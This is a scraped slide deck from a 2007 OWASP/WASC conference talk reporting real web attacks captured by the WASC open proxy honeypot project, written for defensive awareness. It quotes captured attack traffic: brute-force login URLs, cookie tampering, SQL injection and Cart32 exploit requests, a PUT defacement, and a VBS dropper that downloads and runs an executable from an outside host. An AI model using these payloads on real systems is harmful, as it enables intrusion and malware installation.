OWASP AppSec 2004 Presentation

OWASP AppSec 2004 Presentation

WASC Distributed Open Proxy Honeypot Project: Phase 2 Update on Attacks and Vulnerabilities OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 http://www.webappsec.org/ Ryan Barnett, WASC Officer Director of Application Security Training, Breach Security [email protected]

Copyright 2007 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike 2.5 License. To view this license, visit http://creativecommons.org/licenses/ by-sa/2.5/ The OWASP http://www.owasp.org/ Foundation Introduction Ryan Barnett Director of Application Security Training at Breach Security. Background as web server administrator. Author of Preventing Web Attacks with Apache (Addison/Wesley, 2006). Open Source and Community projects:

Board Member, Web Application Security Consortium. Project Leader, WASC Distributed Open Proxy Honeypot Project. Community Manager, ModSecurity. Instructor for the SANS Institute. Project Leader, Center for Internet Securitys Apache Benchmark. OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Distributed Open Proxy Honeypot Project Problem Lack of real web attack log data. Goal To identify/block/report on current web attacks.

Method Instead of functioning as the target of web attacks, we instead run as a conduit for the attacks by running as an open proxy server. Tools Used ModSecurity 2.x, Core Rules and the ModSecurity Management Appliance. http://www.webappsec.org/projects/honeypots OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Why an Open Proxy? There is a lack of perceived value in just deploying a default apache install.

We will most likely only get hit by worms and automated programs scanning IP addresses. Bad guys use them We know that the bad guys use open proxies to loop their attacks through to hide their source IP. We need to function as a real open proxy and only block known malicious attacks. Bad guys will test our systems prior to using them for their attacks. If we dont work as a real open proxy, they will identify this from the initial probe and then not use our systems. OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Typical Initial Testing OWASP & WASC AppSec 2007 Conference San Jose Nov 2007

What are we reporting? We are presenting real, live web attack data captured in-the-wild None of the attack data is simulated or created in labs Data is taken directly from the WASC Distributed Open Proxy Honeypot Project Data is identified by ModSecurity honeypot sensors Focusing on individual attacks vs. statistics and trends This is an area for improvement OWASP & WASC AppSec 2007 Conference San Jose Nov 2007

Why are we reporting this data? To raise public awareness about real attacks To support Web Attack Metrics by providing concrete examples of the types of web attacks that are being carried out on the web Oftentimes there are debates as to the real threat of complex attacks that are presented to the community by Whitehats Are these really the attacks that are being used to compromise sites? OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Phase 1: Active Project Sensors We had a total of 7 active sensor

participants in the following geographic locations Moscow, Russia Crete, Greece Karlsruhe, Germany San Francisco, CA USA Norfolk, VA USA Falls Church, VA USA Foley, AL USA They were deployed for four months (January April 2007). OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Phase 2: New Active Sensors After Phase 1 ended (May 2007), we had several more participants sign up. We now have a total of 14 Sensors in

the following additional locations. Cluj-Napoca, Romania Annapolis, MD USA Numberg, Germany Chicago, IL USA Brussels, Belgium Buenos Aires, Argentina They have been deployed since midOctober 2007. OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Active Contributors

Ivan Ristic Brian Rectanus Ofer Shezaf Robert Auger Sergey Gordeychik Spiros Antonatos Bjoern Weiland Kurt Grutzmacher Pete LeMay Rick Nall

Jeremiah Grossman Peter Guerra Jehiah Czebotar Shaun Vlassis Romn Medina-Heigl Hernndez Peednas Dhamija Erwin Geirnaert Sebastian Garcia Bogdan Calin OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Project Architecture

In b o u n d A tta c k fo r T a r g e t S ite Attacker WASC Analyst H oneypot S ends 200 S t a tu s C o d e WASC Honeypot Sensor Payload Script%23%.asp 1=1/../../ Session ID =UX8serwderakvcx Hacker.exe123 ModSecurity Inspects HTTP Payload and Identifies it as an Attack

Central Logging Host ModSecurity Management Appliance Target Site OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Central Console Dashboard OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Management Console Alert Viewer Optionally update the Alert Viewer to group events by Source IP Address or Alert Severity

OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Management Console Transaction Search OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Additional Custom Honeypot Rules Deny known offenders Run an RBL check and block IPs Track Brute Force Attacks Create IP-based persistent collections Track Authentication Failures Block Client if they exceed the threshold Track SessionIDs

Create session-based persistent collections This data can be used to do session reconstruction or potentially identify Session Hijacking Identify any Credit Card usage OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 ModSecurity Audit Logging and Traffic Categorization All honeypot traffic falls in one of three categories: Normal - Web surfing Abnormal but not malicious - Odd protocol manipulation by poorly written client/spiders, load balancing by Web servers and proprietary applications Malicious - Recon, intrusion attempts and worms We are logging all transactions. Not just those that trigger a rule

How else can we identify new attacks or successful evasions? The majority of traffic (~3/4) did not trigger a ModSecurity rule. What was this traffic? Was it an attack? Was it benign? As we move forward in phase 2, we will be focusing more on this type of data analysis. OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 High-Level Statistics October 2007 Total number of transactions 8,988,361 Number of individual transaction entries that we received Total number of alerts 2,133,677 Number of individual alerts that triggered from one of

our protection rulesets Total unique clients 46,513 Number of remote IP addresses that directly connected to our honeypots Total number of clients looping through other proxy servers 61,846 Number of unique IP addresses that were identified in x-Forwarded-For request headers Total unique targets 171,688 Number of destination websites OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Top Trends Banner-Ad/Click Fraud generated the most traffic ~2,625,522 Requests (click, banner and ad words in URL)

SPAMMERS are the #2 users of open proxy servers HTTP CONNECT Method Requests to have the proxy connect directly to remote SMTP hosts Automated programs to post their SPAM messages to user Forums, etc The majority of web attacks are automated This increases the need for anti-automation defenses Information leakage is a huge problem Too many websites are configured to provide verbose error messages to clients Attackers are looking for easy targets Pick a vulnerability -> Find a site Instead of Pick a site -> Find a Vulnerability Attackers are utilizing Proxy Chaining This makes source tracebacks extremely difficult OWASP & WASC AppSec 2007 Conference San Jose Nov

2007 Top 5 ModSecurity Attack Categories 1 ,0 0 0 ,0 0 0 9 0 0 ,0 0 0 8 0 0 ,0 0 0 7 0 0 ,0 0 0 6 0 0 ,0 0 0 5 0 0 ,0 0 0 4 0 0 ,0 0 0 3 0 0 ,0 0 0 2 0 0 ,0 0 0 1 0 0 ,0 0 0 0 Miss ing Reques t Header s C ONNEC T

Reques t Numer ic Hos t Header Tr affic Det ail s UTF8 Encoding Abuse C l ient Denied by RBL C heck OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Top Attacks Identified by the Honeypot Rules Rule Message Data

(# of Requests) Request Missing a Host Header (575,928) CONNECT Request (415,103) Request Missing a User Agent Header (277,566) Request Missing an Accept Header (130,314) Host header is a numeric IP address (93,579) UTF8 Encoding Abuse Attack Attempt (11,275) Client Denied by RBL Check (3,184) Client Denied Due to Excessive Basic Authentication Failures Request Indicates an automated program explored the site (2,613)

URL Encoding Abuse Attack Attempt (530) SQL Injection Attack. (499) Google robot activity (404) example robot activity (345) IIS Information Leakage (343) HTTP Response Splitting Attack. Matched signature <%0d> (282) SQL Information Leakage (264) URL file extension is restricted by policy (241) Visa Credit Card Number sent from site to user (109) Request Indicates a Security Scanner Scanned the Site (107) PHP source code leakage (107) Request Body Parsing Failed. Multipart: Final boundary missing.

Cross-site Scripting (XSS) Attack. (94) System Command Injection. (90) (2,792) (99) OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 WASC Web Security Threat Classification: Attacks and Vulnerabilities Identified 1 Authentication 1.1 Brute Force 1.2 Insufficient Authentication 1.3 Credential/Session Prediction

2 Authorization 2.1 Insufficient Authorization 2.2 Insufficient Session Expiration 2.3 Session Fixation 3 Client-side Attacks 3.1 Content Spoofing 3.2 Cross-site Scripting/Malicious Code Injection 4 Command Execution 4.5 SQL Injection 5 Information Disclosure 5.2 Information Leakage

6 Logical Attacks 5.2 Insufficient AntiAutomation OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Brute Force Attack A Brute Force attack is an automated process of trial and error used to guess a person's username, password, credit-card number or cryptographic key. We will discuss the following attacks: HEAD Method Scanning Brute Forcing Porn Sites GET Method Logins Scanning Distributed Reverse Brute Force Scans against example

OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 HEAD Request Method Scanning Request is using HEAD to increase the speed of responses (as the web server does not have to send back the response body) The request includes the Authorization header with the base64 encoded credentials Goal is to look for an HTTP Response Status Code of something other than 401 (most often a 200 or 302) OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 GET Method Logins This authentication method passes user credentials on the URL line as arguments instead of using Authorization or Cookie headers This type of authentication is considered not as secure as

the login data can be easily captured in standard log file formats (thus increasing disclosure) Reverse Brute Force Scan The attacker is cycling through different usernames and then repeating the same target password of james GET GET GET GET GET GET http://www.example.com/login?.patner=sbc&login=mc_check&passwd=james&.save=1 HTTP/1.0 http://www.example2.com/login?.patner=sbc&login=mcgolden&passwd=james&.save=1 HTTP/1.0 http://www.example3.com/login?.patner=sbc&login=mc_bob&passwd=james&.save=1 HTTP/1.0 http://www.example4.com/login?.patner=sbc&login=mc_bill&passwd=james&.save=1 HTTP/1.0 http://www.example5.com/login?.patner=sbc&login=mcnumber&passwd=james&.save=1 HTTP/1.0 http://www.example6.com/login?.patner=sbc&login=mc_energy&passwd=james&.save=1 HTTP/1.0

OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Distributed Scanning The attacker is distributing the scan across multiple example domains This many help to reduce the likelihood of identification of the attacks and/or may not cause account lockouts GET GET GET GET GET GET http://www.example.com/login?.patner=sbc&login=mc_check&passwd=james&.save=1 HTTP/1.0 http://www.example2.comlogin?.patner=sbc&login=mcgolden&passwd=james&.save=1 HTTP/1.0 http://www.example3.comlogin?.patner=sbc&login=mc_bob&passwd=james&.save=1 HTTP/1.0 http://www.example4.com/login?.patner=sbc&login=mc_bill&passwd=james&.save=1 HTTP/1.0

http://www.example5.com/login?.patner=sbc&login=mcnumber&passwd=james&.save=1 HTTP/1.0 http://www.example6.com/login?.patner=sbc&login=mc_energy&passwd=james&.save=1 HTTP/1.0 OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Identifying Correct Credentials Failed Authentication Produces a 200 Status Code HTML Text includes Invalid ID or password. Correct Authentication Produces a 302 Status Code HTML Text includes Improve performance. OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Distributed Scanning Part 2 Same distributed reverse scanning concept.

They are targeting a different authentication application. In this example using the verify_user application The response data is easier to parse (next slide) GET GET GET GET GET GET GET http://xxx.xxx.xxx.238/verify_user?l=kevinduffy99&p=mischa HTTP/1.0 http://xxx.xxx.xxx.34/verify_user?l=keziboy&p=mischa HTTP/1.0 http://xxx.xxx.xxx.85/verify_user?l=dowfla&p=mischa HTTP/1.0 http://xxx.xxx.xxx.114/verify_user?l=nomofoyo13&p=mischa HTTP/1.0 http://xxx.xxx.xxx.223/verify_user?l=corruptu_2000&p=mischa HTTP/1.0 http://xxx.xxx.xxx.28/verify_user?l=krdewey01&p=mischa HTTP/1.0 http://xxx.xxx.xxx.114/verify_user?l=nomofoyo13&p=mischa HTTP/1.0

OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Account Enumeration SPAMMERs can use this technique to enumerate valid example accounts To send SPAM to To try and hijack accounts Failed Username ERROR:102:Invalid Login Failed Password ERROR:101:Invalid Password Correct Authentication OK:0:username Attackers successfully enumerated 2 accounts OK:0:skaterman6

OK:0:[email protected] OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Insufficient Authentication Insufficient Authentication occurs when a web site permits an attacker to access sensitive content or functionality without having to properly authenticate. Example: accessing an admin function by passing the username in the URL. Clients do not need to login or submit authorization cookies GET http://www.example.com/english/book/ book.php?page=781&block=776&admin=0 HTTP/1.0 --CUT-- OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Credential/Session Prediction

Credential/Session Prediction is a method of hijacking or impersonating a web site user. Common attack sequence is: 1. Attacker connects to the web application acquiring the current session ID 2. Attacker calculates or Brute Forces the next session ID 3. Attacker switches the current value in the cookie/hidden formfield/URL and assumes the identity of the next user OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 No Encryption/Clear-Text Cookie Data These are examples of session/cookie data sent from applications to clients Since there is no encryption or hashing of data, attackers can easily alter the data (such as incrementing/decrementing the digits) to attempt to take over another users session Set-Cookie: guestID=413;

Set-Cookie: CurrentSessionCookie=212035755652; Set-Cookie: CFID=3937042;expires=Thu, Set-Cookie: Referer=/gate/gb/www.example.com/;Path=/ Set-Cookie: mgUser=1|76ab0352df45407e8033a4faf5d7b0be| 64.5.128.103|1192250622159|1; Domain=.example.com; Expires=Mon, 12-Nov-2007 04 OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Insufficient Entropy These cookie values are not random enough to prevent guessing attacks The first 9 digits are the same with only the last 3 incrementing almost sequentially Set-Cookie: Set-Cookie: Set-Cookie: Set-Cookie:

CurrentSessionCookie=212035755652; CurrentSessionCookie=212035755660; CurrentSessionCookie=212035755669; CurrentSessionCookie=212035755700; OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Insufficient Encryption Unfortunately, sensitive data is often passed within the cookie header data and it is not sufficiently protected with strong encryption Fake or weak protection is often used, such as Base64 Encoding Set-Cookie: cpg132_data=YTozOntzOjI6IklEIjtzOjMyOiI0YTA4YT QwNjNiZjM2ZTc2NjAwMjE2NDRkMDE3NjdjZiI7czoyOiJh bSI7aToxO3M6NDoibmFtZSI7czo0OiJBbm9uIjt9 Set-Cookie: cpg132_data=a:3: {s:2:"ID";s:32:"4a08a4063bf36e7660021644d01767

cf";s:2:"am";i:1;s:4:"name";s:4:"Anon";} OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Insufficient Authorization Insufficient Authorization is when a web site permits access to sensitive content or functionality that should require increased access control restrictions. Cookie in previous example contained a valid sessionid hash and then a username, however poorly written applications often do not make a connection between the valid sessionid and the username What happens if an attacker alters portions of the cookie value and changes the username? Set-Cookie: cpg132_data=a:3: {s:2:"ID";s:32:"4a08a4063bf36e7660021644d01767cf ";s:2:"am";i:1;s:4:"name";s:5:"Admin";} OWASP & WASC AppSec 2007 Conference San Jose Nov

2007 Insufficient Authorization: Web Defacements HTTP PUT method --6aa02c14-B-PUT http://www.example.com/scorpion.txt HTTP/1.0 Accept-Language: pt-br, en-us;q=0.5 Translate: f Content-Length: 36 User-Agent: Microsoft Data Access Internet Publishing Provider DAV 1.1 Host: www.example.com Pragma: no -cache --6aa02c14-C-1923Turk CyberscorpioN ownz your box OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Insufficient Session Expiration Insufficient Session Expiration is when a web site

permits an attacker to reuse old session credentials or session IDs for authorization. No expiration date/time specified Set-Cookie: phpbb2mysql_sid=9ff3b118fbbf63e088c99d09d810e311; path=/; domain=d M Y, G.i Expiration date/time is too long Set-Cookie: cpvr=3cc2d13f-1b27-4c11-a277-b3cb77bf33e3; domain=example.com; expires=Sun, 16-Jan-2107 12:27:36 GMT; path=/ OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Insufficient Session Expiration Continued It is also important to note that proper session expiration means expiring, invalidating or deleting the sessionid in BOTH the web browser and the web application

Poorly written web applications only attempt to expire or delete the cookie from the web browser Set-Cookie: T=z=0; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.example.com Remember you do not own the browser! These cookies can potentially be sent back to the web application Will they let the user back in??? OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Other Cookie Issues Minimal use of HTTPOnly and Secure Cookie protections Httponly helps to prevent cookies from being read by client-side scripting Set-Cookie: ASP.NET_SessionId=prqc4d2slpwo3c45yixtbo55;

path=/; HttpOnly Secure will ensure that the cookie is only sent to an SSL-enabled site Set-Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; expires=Wed, 16-Jan-2008 19:59:57 GMT; path=/; secure OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Session Fixation Session Fixation is an attack technique that forces a user's session ID to an explicit value. While we did not see direct evidence of Session Fixation, we did see web applications that allowed sessionid information to be passed on the URL, which makes a session fixation attack easier to execute by including these web links within emails sent to target victims: POST http://www.example.com/joinSubmitAction.do;

jsessionid=DF4B9604ED1467DFECD4BDA7452E23D9 HTTP/1.1 POST http://www.example.com/account/login.php;sessionid=6d0 e2a51c515cb5b877bae03972a0a78 HTTP/1.1 OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Content Spoofing Content Spoofing is an attack technique used to trick a user into believing that certain content appearing on a web site is legitimate and not from an external source. We ran into an interesting Blog defacement It uses Javascript in the following manner Opens an alert box Opens a document.window to displays an alternative page from a remote site OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 URL Decoded Javascript

")); //--> ")); //--> ")); //--> ")); //--> ')); //--> OWASP & WASC AppSec 2007 Conference San Jose Nov

2007 bicho.htm Attempted VBS Malware Install tf = fso.CreateTextFile(cSystemDir + "runit.vbs", true); //tf = fso.CreateTextFile("c:\\runit.vbs", true); tf.WriteLine("On Error Resume Next"); tf.WriteLine("URL = \"http://rzone.com.ar/xD.exe\""); tf.WriteLine("Set xml = CreateObject(\"Microsoft.XMLHTTP\")"); tf.WriteLine("xml.Open \"GET\", URL, False"); tf.WriteLine("xml.Send"); tf.WriteLine("set oStream = createobject(\"Adodb.Stream\")"); tf.WriteLine("oStream.type = 1"); tf.WriteLine("oStream.open"); tf.WriteLine("oStream.write xml.responseBody"); tf.WriteLine("oStream.savetofile \"" + cSystemDir + "xD.exe\", 1"); tf.WriteLine("oStream.close"); tf.WriteLine("set oStream = nothing"); tf.WriteLine("Set xml = Nothing");

tf.WriteLine("Set oShell = createobject(\"WScript.Shell\")"); tf.WriteLine("oShell.run \"" + cSystemDir + "xD.exe\", 1, false"); tf.Close(); objShell.run("\"" + cSystemDir + "runit.vbs\""); OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Embed.htm Attempted ActiveX Malware Install OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 More Javascript Malware Injections: A Serious Problem

There are many websites that are injecting malicious javascript into legitimate webpages. The javascript may be injected either by remote attackers or by the website owner themselves. Beware of what site you visit. Recommend using sandboxed browsers as throw-away sessions. VMware images Applications such as Sandboxie http://www.sandboxie.com/ OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Honeypot Example: Client visits ProxyChecker site POST http://www.example.com/boyter/CheckProxy.php HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en

Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application/x-www-form-urlencoded Host: www.example.com Content-Length: 21 seed=9D3BFF73E33871B5 OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 ProxyChecker Response HTTP/1.1 200 OK Notice: Subject to Monitoring X-Powered-By: PHP/5.2.0 Content-Type: text/html Via: 1.0 debian.localdomain Content-Length: 4080 Connection: close

Hmm looks like there should be moe data??? hash=9D3BFF73E33871B5 REMOTE_ADDR=70.187.221.243 HTTP_VIA=1.0 debian.localdomain HTTP_X_FORWARDED_FOR= OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Here Comes the Javascript! OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Sandbox Testing the Javascript I decided to test out executing the javascript to see what it would do. I used Sandboxie and Burp Proxy to intercept/manipulate/record the Javascript. Here we go OWASP & WASC AppSec 2007 Conference San Jose Nov 2007

Redirect to a new site GET /html/ HTTP/1.1 Host: www.example.com.cee4f2730c07001bdf06d6a5.update1.classictel.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/ plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://www.example.com/js.html HTTP/1.1 302 Found Date: Mon, 08 Oct 2007 21:28:45 GMT Server: Apache/2.2.4 (Fedora) X-Powered-By: PHP/5.1.6 Location: http://bibi32.org/505/Xp/

Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 MS Windows Media Player 10 Plugin Overflow Exploit (MS06-006) OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Cross-site Scripting Cross-site Scripting (XSS) is an attack technique that forces a web site to echo attacker-supplied executable

code, which loads in a user's browser. All inbound XSS alert messages were triggered by either SPAMMERS sending their html posts to various message boards Poor HTML that accidentally added javascript to links OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 SQL Injection SQL Injection is an attack technique used to exploit web sites that construct SQL statements from user-supplied input. GET http://www.example.com/app.aspx?pid=6246'%20and %20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'=' HTTP/ 1.1 User-Agent: Internet Explorer 6.0 Host: www.example.com

Cookie: ASP.NET_SessionId=zidkywu4rcfegi554fmc3c2q OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Cart32 GetImage Arbitrary File Download Exploit Attempt Description: Cart32 is a web-based content manager. The application is exposed to an arbitrary file download issue because it fails to sufficiently sanitize user-supplied input to the "ImageName" parameter of the "GetImage" script. Cart32 version 6.3 is affected. Ref: http://www.securityfocus.com/bid/25928 Exploit Example GET //cgi-bin/c32web.exe/GetImage? ImageName=CustomerEmail.txt%00.pdf HTTP/1.1 The attacker sent similar probes for other common directory locations for the Cart32 application

//scripts/c32web.exe/GetImage //cgi/c32web.exe/GetImage //Cart32/c32web.exe/GetImage OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Information Leakage Information Leakage is when a web site reveals sensitive data, such as developer comments or error messages, which may aid an attacker in exploiting the system. As the previous section on SQL Injection showed, presenting verbose error messages to clients can not only provide attackers with information to aid in future attacks, but they can also be the actual transport for extracted information OWASP & WASC AppSec 2007 Conference San Jose Nov 2007

Example Detailed Error Message OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Reveals Version Information OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Insufficient Anti-Automation Insufficient Anti-automation is when a web site permits an attacker to automate a process that should only be performed manually. Certain web site functionalities should be protected against automated attacks. Account Registrations Blog/Forum postings

OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 The Poor-Mans CAPTCHA Response Details HTTP/1.1 401 Unauthorized WWW-Authenticate: Basic realm="Username : nospam - Password : iamnotspam" Content-Length: 401 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from webgate X-Cache-Lookup: MISS from webgate:80 Via: 1.0 www.testproxy.net Notice: Subject to Monitoring Connection: close OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Lessons Learned (1)

Web attacks are running rampant Automation Attackers are extremely bold, mainly due to their anonymity by hiding behind numerous open proxy servers Application defects (server misconfigurations, cookie weaknesses, error messages) are a significant problem area False Positives were high in some classes of attacks, however, that was mainly due to open proxy deployment and would not manifest itself in normal production environments OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Lessons Learned (2) As good as the identification/protection rules were, we still had analysis challenges due to data

overload We need better/automated ways to categorize attacks Even so, some activities are difficult to identify by looking at just one transaction We need better correlation capabilities to identify anomalies and trends over time Correlation of event data and full audit logging for forensics is essential If you would like to participate in the WASC Distributed Open Proxy Honeypot Project, please visit the website for more information http://www.webappsec.org/projects/honeypots/ Questions? OWASP & WASC AppSec 2007 Conference San Jose Nov 2007

Recently Viewed Presentations

  • Financial crises, the IMF, and Mexico Lecture 17

    Financial crises, the IMF, and Mexico Lecture 17

    Current account deficits with fixed exchange rates. Some countries have pegged currencies, so they are unwilling or unable to depreciate. The costs of leaving the fixed currency may be too high to consider as a policy option.
  • Who Wants to Be a Millionaire? - Commack Schools

    Who Wants to Be a Millionaire? - Commack Schools

    Thanks for playing! 50:50 POLL PHONE-A-FRIEND * Lifeline icons on the question slides are hyperlinks which will take you to the lifeline screen. To return to the game, you may right click on the screen, choose Go, Previously Viewed. This...
  • READING HOW YOU CAN HELP AT HOME:  Word

    READING HOW YOU CAN HELP AT HOME: Word

    •Phonics is just the beginning to becoming a fluent reader… Please continue to read with your child each night and encourage them to: • Talk about the pictures and what the book may be about before reading
  • The State of Giving Today  An Overview of

    The State of Giving Today An Overview of

    State agency respondents recognize that nonprofit organizations have highly developed insight and expertise working with certain populations. As one respondent said, "Nonprofit organizations have their finger on the pulse of what ' s happening in the communities in which they...
  • The Fraction Splat! Series Set 11.1 This set

    The Fraction Splat! Series Set 11.1 This set

    The Fraction Splat! Series. Set 11.1. This set includes unit fractions and a single Splat! Steve . Wyborney. Click to download the . original 50 . Splat! lessons. or click to download . The Fraction Splat! Series.
  • Chapter 16 - Solutions

    Chapter 16 - Solutions

    What is the concentration, in percent (v/v), of a solution containing 50mL of diethyl ether in 2.5L of solution? How many grams of K. 2 SO 4 would you need to prepare 1500g of 5.0% K 2 SO 4 (m/m)...
  • Joseph Cornell

    Joseph Cornell

    Biography. Born 1903 in Nyack, New York to mother, father, two sisters and brother. Father died of Leukemia when Cornell was only thirteen. Cornell was known to be extremely shy and insecure, and seemed to be overly fearful of many...
  • Microminerals Trace elements required in small amts. Also

    Microminerals Trace elements required in small amts. Also

    Manganese (Mn) Activation of enzyme, lipid, and carb metabolism, bone development, reproduction and cell membrane integrity. Manganese Deficiency Decreased growth (rare in cats and dogs) Impaired reproduction Manganese Excess Relatively non-toxic Selenium (Se) Immune function, interacts with vitamins E to...